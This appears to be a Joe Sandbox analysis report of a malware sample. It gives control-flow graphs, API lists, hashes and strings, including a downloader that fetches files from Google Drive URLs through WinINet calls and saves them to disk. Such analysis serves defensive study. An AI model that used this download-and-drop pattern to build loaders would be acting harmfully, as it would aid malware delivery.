                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eed29142c0b17473f8e06e9c831029cfc41bd86864cffae7e9f34e7c1f3a7299
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCD29D22F18B86C5FB00CB64D5903BD2362BF557A8F009639DA6C97ADADF78E184D341

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 5057 7ff684566190-7ff6845661ec call 7ff6845a3600 5060 7ff6845662f7-7ff6845662fe 5057->5060 5061 7ff6845661f2-7ff684566200 5057->5061 5062 7ff68456631a-7ff684566328 5060->5062 5063 7ff684566300-7ff684566309 5060->5063 5064 7ff684566757-7ff68456675c call 7ff684562410 5061->5064 5065 7ff684566206-7ff68456620b 5061->5065 5070 7ff68456632e-7ff684566368 call 7ff6845860e0 5062->5070 5071 7ff684566751-7ff684566756 call 7ff684562410 5062->5071 5068 7ff68456630b 5063->5068 5069 7ff68456630e-7ff684566315 call 7ff6845806d0 5063->5069 5081 7ff68456675d-7ff684566762 call 7ff6845acd30 5064->5081 5066 7ff68456620d 5065->5066 5067 7ff684566210-7ff684566274 call 7ff6845860e0 call 7ff6845808c0 5065->5067 5066->5067 5094 7ff684566276-7ff684566287 5067->5094 5095 7ff6845662b1-7ff6845662c1 5067->5095 5068->5069 5069->5062 5083 7ff68456636a-7ff68456637c 5070->5083 5084 7ff68456639c-7ff6845663aa 5070->5084 5071->5064 5093 7ff684566763-7ff684566768 call 7ff6845acd30 5081->5093 5088 7ff684566397 call 7ff6845a2790 5083->5088 5089 7ff68456637e-7ff684566391 5083->5089 5084->5071 5090 7ff6845663b0-7ff6845663b8 5084->5090 5088->5084 5089->5088 5096 7ff684566769-7ff68456676f call 7ff6845acd30 5089->5096 5091 7ff6845663ba 5090->5091 5092 7ff6845663bd-7ff6845663e9 call 7ff6845860e0 5090->5092 5091->5092 5110 7ff6845663eb-7ff6845663fd 5092->5110 5111 7ff68456641d-7ff684566440 InternetOpenA 5092->5111 5093->5096 5101 7ff684566289-7ff68456629c 5094->5101 5102 7ff6845662a2-7ff6845662ac call 7ff6845a2790 5094->5102 5095->5062 5103 7ff6845662c3-7ff6845662d5 5095->5103 5101->5081 5101->5102 5102->5095 5108 7ff6845662d7-7ff6845662ea 5103->5108 5109 7ff6845662f0-7ff6845662f5 call 7ff6845a2790 5103->5109 5108->5093 5108->5109 5109->5062 5115 7ff684566418 call 7ff6845a2790 5110->5115 5116 7ff6845663ff-7ff684566412 5110->5116 5117 7ff684566442-7ff684566474 call 7ff6845844a0 5111->5117 5118 7ff6845664b1-7ff6845664e1 InternetOpenUrlA 5111->5118 5115->5111 5116->5096 5116->5115 5128 7ff68456647a-7ff68456648c 5117->5128 5129 7ff6845666e9 5117->5129 5119 7ff6845664e3-7ff684566515 call 7ff6845844a0 5118->5119 5120 7ff684566552-7ff68456655a 5118->5120 5131 7ff68456651b-7ff68456652d 5119->5131 5132 7ff6845666e0-7ff6845666e3 InternetCloseHandle 5119->5132 5124 7ff68456655c 5120->5124 5125 7ff68456655f-7ff684566571 call 7ff6845a9edc 5120->5125 5124->5125 5142 7ff684566577-7ff68456657c 5125->5142 5143 7ff684566671-7ff6845666a3 call 7ff6845844a0 5125->5143 5133 7ff6845664a7-7ff6845664ac call 7ff6845a2790 5128->5133 5134 7ff68456648e-7ff6845664a1 5128->5134 5135 7ff6845666eb-7ff6845666f3 5129->5135 5137 7ff684566548-7ff68456654d call 7ff6845a2790 5131->5137 5138 7ff68456652f-7ff684566542 5131->5138 5132->5129 5133->5129 5134->5096 5134->5133 5139 7ff684566722-7ff68456674a call 7ff6845a2770 5135->5139 5140 7ff6845666f5-7ff684566706 5135->5140 5137->5132 5138->5096 5138->5137 5149 7ff68456671d call 7ff6845a2790 5140->5149 5150 7ff684566708-7ff68456671b 5140->5150 5142->5143 5145 7ff684566582-7ff68456659b InternetReadFile 5142->5145 5160 7ff6845666d7-7ff6845666da InternetCloseHandle 5143->5160 5161 7ff6845666a5-7ff6845666b7 5143->5161 5152 7ff68456659d 5145->5152 5153 7ff6845665d7-7ff6845665fd call 7ff6845a8fe0 InternetCloseHandle * 2 5145->5153 5149->5139 5150->5149 5151 7ff68456674b-7ff684566750 call 7ff6845acd30 5150->5151 5151->5071 5158 7ff6845665a0-7ff6845665a5 5152->5158 5153->5071 5170 7ff684566603-7ff684566608 5153->5170 5158->5153 5163 7ff6845665a7-7ff6845665d5 call 7ff6845a9c48 InternetReadFile 5158->5163 5160->5132 5165 7ff6845666b9-7ff6845666cc 5161->5165 5166 7ff6845666d2 call 7ff6845a2790 5161->5166 5163->5153 5163->5158 5165->5096 5165->5166 5166->5160 5172 7ff68456660a 5170->5172 5173 7ff68456660d-7ff684566639 call 7ff6845860e0 5170->5173 5172->5173 5176 7ff68456663b-7ff68456664d 5173->5176 5177 7ff68456666d-7ff68456666f 5173->5177 5178 7ff684566668 call 7ff6845a2790 5176->5178 5179 7ff68456664f-7ff684566662 5176->5179 5177->5135 5178->5177 5179->5096 5179->5178
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Internet$CloseHandle_invalid_parameter_noinfo_noreturn$FileOpenRead
                                                                                                                                                                                                                                                                                          • String ID: &export=download$*$DST: $Failed to open file for writing.$File downloaded successfully and saved as $FileDownloader$InternetOpen failed.$InternetOpenUrl failed.$Q]1y$URL: $https://drive.google.com/uc?id=
                                                                                                                                                                                                                                                                                          • API String ID: 1313048855-2496810775
                                                                                                                                                                                                                                                                                          • Opcode ID: 4639291ec341a60a2cc4afd7a0e8c87ad7a9a4ea5c0def95dc1264ce19a52618
                                                                                                                                                                                                                                                                                          • Instruction ID: 09dc59841d9d6fd026dc9dde618767b283a6be3a622977432e3f85cd8f26ee5a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4639291ec341a60a2cc4afd7a0e8c87ad7a9a4ea5c0def95dc1264ce19a52618
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EF19262F18B46C1EA10CB65E4943BD6361FF857A8F104239EA6D86BD9DF7CE481C702

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 7026 7ff6845be170-7ff6845be1e3 call 7ff6845bdd54 7029 7ff6845be1e5-7ff6845be1ee call 7ff6845b1654 7026->7029 7030 7ff6845be1fd-7ff6845be207 call 7ff6845bc6e4 7026->7030 7035 7ff6845be1f1-7ff6845be1f8 call 7ff6845b1674 7029->7035 7036 7ff6845be222-7ff6845be28b CreateFileW 7030->7036 7037 7ff6845be209-7ff6845be220 call 7ff6845b1654 call 7ff6845b1674 7030->7037 7053 7ff6845be53e-7ff6845be55e 7035->7053 7038 7ff6845be308-7ff6845be313 GetFileType 7036->7038 7039 7ff6845be28d-7ff6845be293 7036->7039 7037->7035 7045 7ff6845be315-7ff6845be350 GetLastError call 7ff6845b15e8 CloseHandle 7038->7045 7046 7ff6845be366-7ff6845be36d 7038->7046 7042 7ff6845be2d5-7ff6845be303 GetLastError call 7ff6845b15e8 7039->7042 7043 7ff6845be295-7ff6845be299 7039->7043 7042->7035 7043->7042 7051 7ff6845be29b-7ff6845be2d3 CreateFileW 7043->7051 7045->7035 7061 7ff6845be356-7ff6845be361 call 7ff6845b1674 7045->7061 7049 7ff6845be36f-7ff6845be373 7046->7049 7050 7ff6845be375-7ff6845be378 7046->7050 7056 7ff6845be37e-7ff6845be3d3 call 7ff6845bc5fc 7049->7056 7050->7056 7057 7ff6845be37a 7050->7057 7051->7038 7051->7042 7064 7ff6845be3d5-7ff6845be3e1 call 7ff6845bdf5c 7056->7064 7065 7ff6845be3f2-7ff6845be423 call 7ff6845bdad4 7056->7065 7057->7056 7061->7035 7064->7065 7073 7ff6845be3e3 7064->7073 7071 7ff6845be425-7ff6845be427 7065->7071 7072 7ff6845be429-7ff6845be46b 7065->7072 7074 7ff6845be3e5-7ff6845be3ed call 7ff6845b84b8 7071->7074 7075 7ff6845be48d-7ff6845be498 7072->7075 7076 7ff6845be46d-7ff6845be471 7072->7076 7073->7074 7074->7053 7078 7ff6845be49e-7ff6845be4a2 7075->7078 7079 7ff6845be53c 7075->7079 7076->7075 7077 7ff6845be473-7ff6845be488 7076->7077 7077->7075 7078->7079 7081 7ff6845be4a8-7ff6845be4ed CloseHandle CreateFileW 7078->7081 7079->7053 7083 7ff6845be4ef-7ff6845be51d GetLastError call 7ff6845b15e8 call 7ff6845bc824 7081->7083 7084 7ff6845be522-7ff6845be537 7081->7084 7083->7084 7084->7079
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1617910340-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 96994052f686da90be6cdd5d0272697e511c0871d647bfaba78ffb88d0ffef50
                                                                                                                                                                                                                                                                                          • Instruction ID: 23b5ebf810830eb60e855750d10d4090d59a1bb8a3dac0e5efbc16e4f6ec1378
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96994052f686da90be6cdd5d0272697e511c0871d647bfaba78ffb88d0ffef50
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12C1BB32B28A42C6EB50CFA8D4906AC3761FB49BA8B044239DA1E977D5DF3CE556C301

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 7089 7ff6845bd544-7ff6845bd579 call 7ff6845bc9c0 call 7ff6845bc9c8 call 7ff6845bca30 7096 7ff6845bd57f-7ff6845bd58a call 7ff6845bc9d0 7089->7096 7097 7ff6845bd6b7-7ff6845bd725 call 7ff6845acd60 call 7ff6845c695c 7089->7097 7096->7097 7103 7ff6845bd590-7ff6845bd59b call 7ff6845bca00 7096->7103 7109 7ff6845bd733-7ff6845bd736 7097->7109 7110 7ff6845bd727-7ff6845bd72e 7097->7110 7103->7097 7108 7ff6845bd5a1-7ff6845bd5c4 call 7ff6845b8340 GetTimeZoneInformation 7103->7108 7119 7ff6845bd68c-7ff6845bd6b6 call 7ff6845bc9b8 call 7ff6845bc9a8 call 7ff6845bc9b0 7108->7119 7120 7ff6845bd5ca-7ff6845bd5eb 7108->7120 7113 7ff6845bd738 7109->7113 7114 7ff6845bd76d-7ff6845bd780 call 7ff6845ba168 7109->7114 7112 7ff6845bd7c3-7ff6845bd7c6 7110->7112 7117 7ff6845bd7cc-7ff6845bd7d4 call 7ff6845bd2c8 7112->7117 7118 7ff6845bd73b 7112->7118 7113->7118 7129 7ff6845bd782 7114->7129 7130 7ff6845bd78b-7ff6845bd7a6 call 7ff6845c695c 7114->7130 7123 7ff6845bd740-7ff6845bd76c call 7ff6845b8340 call 7ff6845a2770 7117->7123 7118->7123 7124 7ff6845bd73b call 7ff6845bd544 7118->7124 7125 7ff6845bd5f6-7ff6845bd5fd 7120->7125 7126 7ff6845bd5ed-7ff6845bd5f3 7120->7126 7124->7123 7132 7ff6845bd611 7125->7132 7133 7ff6845bd5ff-7ff6845bd607 7125->7133 7126->7125 7136 7ff6845bd784-7ff6845bd789 call 7ff6845b8340 7129->7136 7148 7ff6845bd7a8-7ff6845bd7ab 7130->7148 7149 7ff6845bd7ad-7ff6845bd7bf call 7ff6845b8340 7130->7149 7138 7ff6845bd613-7ff6845bd687 call 7ff6845c99f0 * 4 call 7ff6845b1824 call 7ff6845bd7dc * 2 7132->7138 7133->7132 7139 7ff6845bd609-7ff6845bd60f 7133->7139 7136->7113 7138->7119 7139->7138 7148->7136 7149->7112
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF6845BD572
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF6845BCA30: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6845BCA44
                                                                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF6845BD583
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF6845BC9D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6845BC9E4
                                                                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF6845BD594
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF6845BCA00: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6845BCA14
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF6845B8340: RtlFreeHeap.NTDLL(?,?,?,00007FF6845C2B26,?,?,?,00007FF6845C2EA3,?,?,00000000,00007FF6845C33AD,?,?,?,00007FF6845C32DF), ref: 00007FF6845B8356
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF6845B8340: GetLastError.KERNEL32(?,?,?,00007FF6845C2B26,?,?,?,00007FF6845C2EA3,?,?,00000000,00007FF6845C33AD,?,?,?,00007FF6845C32DF), ref: 00007FF6845B8360
                                                                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6845BD7D4), ref: 00007FF6845BD5BB
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                                                          • String ID: Eastern Standard Time$Eastern Summer Time$Q]1y
                                                                                                                                                                                                                                                                                          • API String ID: 3458911817-4173481814
                                                                                                                                                                                                                                                                                          • Opcode ID: 605e4d1620cc9cfca92c84b904f75bcfa21439f3ad89b664e143ebe8e45af373
                                                                                                                                                                                                                                                                                          • Instruction ID: ae632fa45c054e5674fa297a67a8a63c804133df8ec722c4623986d9a17bf0b6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 605e4d1620cc9cfca92c84b904f75bcfa21439f3ad89b664e143ebe8e45af373
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0516836A18642C6F720DF21E8D15AD6760BF88B84F44513EEA4DC3A9AEF3CE444C742
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Find$CloseConcurrency::cancel_current_taskFileNext__std_fs_code_page
                                                                                                                                                                                                                                                                                          • String ID: 1$Q]1y$directory_entry::status$directory_iterator::directory_iterator$exists
                                                                                                                                                                                                                                                                                          • API String ID: 1745604696-3988379306
                                                                                                                                                                                                                                                                                          • Opcode ID: b499a82b978a46e74169e3f81622344ba6f3a6f64f88cd31419b6ca9b0efcad5
                                                                                                                                                                                                                                                                                          • Instruction ID: 072a1d7e6822300b8bce4ca99477bb5534fa09a65adc5256b80b6b692f079312
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b499a82b978a46e74169e3f81622344ba6f3a6f64f88cd31419b6ca9b0efcad5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9D17462A18B82C1EA209B25E4843BF7361FF86794F105635DB9D83AD9DF7CE980C701

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 5785 7ff68459e7c8-7ff68459e811 call 7ff68459e770 5788 7ff68459e84e-7ff68459e851 5785->5788 5789 7ff68459e813 5785->5789 5790 7ff68459e857-7ff68459e871 call 7ff68459e770 5788->5790 5791 7ff68459e9bb-7ff68459e9c2 5788->5791 5792 7ff68459e816-7ff68459e83a SetFileInformationByHandle 5789->5792 5790->5792 5804 7ff68459e873-7ff68459e882 5790->5804 5794 7ff68459e9d3 5791->5794 5795 7ff68459e9c4-7ff68459e9c7 5791->5795 5796 7ff68459e8b8-7ff68459e8c3 GetLastError 5792->5796 5797 7ff68459e83c-7ff68459e840 5792->5797 5800 7ff68459e9d5 5794->5800 5795->5794 5799 7ff68459e9c9-7ff68459e9cc 5795->5799 5801 7ff68459e8c5-7ff68459e8c8 5796->5801 5802 7ff68459e8db-7ff68459e8e5 call 7ff68459e03c 5796->5802 5803 7ff68459e843-7ff68459e847 5797->5803 5799->5794 5805 7ff68459e9ce-7ff68459e9d1 5799->5805 5812 7ff68459e9dd-7ff68459e9e2 call 7ff6845b1774 5800->5812 5801->5802 5806 7ff68459e8ca-7ff68459e8cd 5801->5806 5802->5797 5815 7ff68459e8eb-7ff68459e8ee 5802->5815 5808 7ff68459e892-7ff68459e8b7 call 7ff6845a2770 5803->5808 5809 7ff68459e849-7ff68459e84c 5803->5809 5804->5808 5810 7ff68459e884-7ff68459e88c CloseHandle 5804->5810 5805->5794 5805->5800 5806->5802 5813 7ff68459e8cf 5806->5813 5809->5810 5810->5808 5810->5812 5822 7ff68459e9e3-7ff68459e9eb call 7ff6845b1774 5812->5822 5818 7ff68459e8d3-7ff68459e8d6 5813->5818 5815->5813 5819 7ff68459e8f0-7ff68459e8f3 5815->5819 5818->5803 5819->5813 5821 7ff68459e8f5-7ff68459e90c GetFileInformationByHandleEx 5819->5821 5823 7ff68459e90e 5821->5823 5824 7ff68459e93b-7ff68459e940 5821->5824 5826 7ff68459e912-7ff68459e918 GetLastError 5823->5826 5827 7ff68459e942-7ff68459e95c SetFileInformationByHandle 5824->5827 5828 7ff68459e9b5-7ff68459e9b9 5824->5828 5831 7ff68459e91b-7ff68459e91f 5826->5831 5827->5823 5832 7ff68459e95e-7ff68459e968 call 7ff68459e03c 5827->5832 5830 7ff68459e99a-7ff68459e9a1 5828->5830 5830->5831 5831->5808 5833 7ff68459e925-7ff68459e930 CloseHandle 5831->5833 5837 7ff68459e973-7ff68459e976 5832->5837 5838 7ff68459e96a-7ff68459e971 5832->5838 5833->5822 5835 7ff68459e936 5833->5835 5835->5808 5839 7ff68459e9a6-7ff68459e9b0 GetLastError 5837->5839 5840 7ff68459e978-7ff68459e994 SetFileInformationByHandle 5837->5840 5838->5831 5839->5818 5840->5826 5840->5830
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Handle$File$ErrorInformationLast$Close__std_fs_open_handle$CreateFeaturePresentProcessor
                                                                                                                                                                                                                                                                                          • String ID: Q]1y
                                                                                                                                                                                                                                                                                          • API String ID: 2221425841-3642082322
                                                                                                                                                                                                                                                                                          • Opcode ID: 6bdbc50bed84b278626fece3ce0b26b3c0551dd7d3482e459f54058572bd27a5
                                                                                                                                                                                                                                                                                          • Instruction ID: 63bdfebc537bd545af763e898f75dc6ec09b8d486d46dca97233c25a853dbadc
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6bdbc50bed84b278626fece3ce0b26b3c0551dd7d3482e459f54058572bd27a5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4519161F08642C9F7648BB5A8842BD2FA0BF45798F18023DCD1AD6AC4DF3EE651C742

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 6725 7ff68456a810-7ff68456a86e 6726 7ff68456a873-7ff68456a8ce call 7ff68459e0b4 call 7ff684563ab0 call 7ff6845817c0 6725->6726 6727 7ff68456a870 6725->6727 6733 7ff68456a8d3-7ff68456a8d5 6726->6733 6727->6726 6734 7ff68456a8db-7ff68456a8e4 6733->6734 6735 7ff68456ac76-7ff68456ac89 call 7ff684564d50 6733->6735 6737 7ff68456a91d-7ff68456a933 6734->6737 6738 7ff68456a8e6-7ff68456a8fd 6734->6738 6744 7ff68456ac8a-7ff68456ac8f call 7ff6845acd30 6735->6744 6739 7ff68456a935-7ff68456a939 6737->6739 6740 7ff68456a941-7ff68456a955 6737->6740 6742 7ff68456a918 call 7ff6845a2790 6738->6742 6743 7ff68456a8ff-7ff68456a912 6738->6743 6739->6740 6746 7ff68456a957-7ff68456a95b 6740->6746 6747 7ff68456a963-7ff68456a978 6740->6747 6742->6737 6743->6742 6743->6744 6757 7ff68456ac90-7ff68456ac9f call 7ff684564d50 6744->6757 6746->6747 6748 7ff68456a97a-7ff68456a985 6747->6748 6749 7ff68456a9bf-7ff68456a9c7 6747->6749 6752 7ff68456a9b7 6748->6752 6753 7ff68456a987-7ff68456a9a2 6748->6753 6754 7ff68456a9d0-7ff68456a9db 6749->6754 6752->6749 6753->6752 6769 7ff68456a9a4-7ff68456a9b5 6753->6769 6755 7ff68456abb5-7ff68456abc0 6754->6755 6756 7ff68456a9e1-7ff68456aa08 call 7ff6845655a0 6754->6756 6760 7ff68456ac02-7ff68456ac05 6755->6760 6761 7ff68456abc2-7ff68456abcd 6755->6761 6771 7ff68456aa0a-7ff68456aa12 6756->6771 6772 7ff68456aa18-7ff68456aa1b 6756->6772 6773 7ff68456aca0-7ff68456aca5 call 7ff6845acd30 6757->6773 6763 7ff68456ac07-7ff68456ac12 6760->6763 6764 7ff68456ac3f-7ff68456ac75 call 7ff6845a2770 6760->6764 6767 7ff68456abfa 6761->6767 6768 7ff68456abcf-7ff68456abea 6761->6768 6763->6764 6770 7ff68456ac14-7ff68456ac2e 6763->6770 6767->6760 6768->6767 6787 7ff68456abec-7ff68456abf4 6768->6787 6769->6749 6770->6764 6789 7ff68456ac30-7ff68456ac3e 6770->6789 6771->6757 6771->6772 6775 7ff68456ab9b-7ff68456abaa call 7ff684564f80 6772->6775 6776 7ff68456aa21-7ff68456aa29 6772->6776 6790 7ff68456aca6-7ff68456acab call 7ff6845acd30 6773->6790 6792 7ff68456acac-7ff68456acd2 call 7ff684564c60 6775->6792 6793 7ff68456abb0 6775->6793 6783 7ff68456aa2b 6776->6783 6784 7ff68456aa2e-7ff68456aa44 call 7ff684563c20 6776->6784 6783->6784 6798 7ff68456aa46-7ff68456aa4d 6784->6798 6799 7ff68456aa7e-7ff68456aac3 call 7ff684584160 call 7ff684563f60 6784->6799 6787->6767 6789->6764 6790->6792 6807 7ff68456acd7-7ff68456ace0 6792->6807 6808 7ff68456acd4 6792->6808 6793->6754 6802 7ff68456aa55-7ff68456aa5c 6798->6802 6803 7ff68456aa4f-7ff68456aa53 6798->6803 6819 7ff68456aaf7-7ff68456ab02 call 7ff684587d80 6799->6819 6820 7ff68456aac5-7ff68456aaf5 6799->6820 6802->6798 6806 7ff68456aa5e-7ff68456aa61 6802->6806 6803->6802 6803->6806 6806->6799 6810 7ff68456aa63-7ff68456aa6e 6806->6810 6811 7ff68456ace2-7ff68456acf4 6807->6811 6812 7ff68456ad30-7ff68456ad41 6807->6812 6808->6807 6810->6799 6815 7ff68456aa70-7ff68456aa74 6810->6815 6813 7ff68456acf7-7ff68456acfa 6811->6813 6817 7ff68456acfc-7ff68456ad13 call 7ff6845c9d90 6813->6817 6818 7ff68456ad15-7ff68456ad18 6813->6818 6815->6799 6816 7ff68456aa76-7ff68456aa7c 6815->6816 6816->6799 6816->6810 6817->6818 6829 7ff68456ad1f-7ff68456ad2f 6817->6829 6818->6812 6822 7ff68456ad1a-7ff68456ad1d 6818->6822 6823 7ff68456ab03-7ff68456ab0f 6819->6823 6820->6823 6822->6813 6826 7ff68456ab43-7ff68456ab62 6823->6826 6827 7ff68456ab11-7ff68456ab23 6823->6827 6826->6775 6832 7ff68456ab64-7ff68456ab7b 6826->6832 6830 7ff68456ab25-7ff68456ab38 6827->6830 6831 7ff68456ab3e call 7ff6845a2790 6827->6831 6830->6773 6830->6831 6831->6826 6834 7ff68456ab7d-7ff68456ab90 6832->6834 6835 7ff68456ab96 call 7ff6845a2790 6832->6835 6834->6790 6834->6835 6835->6775
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
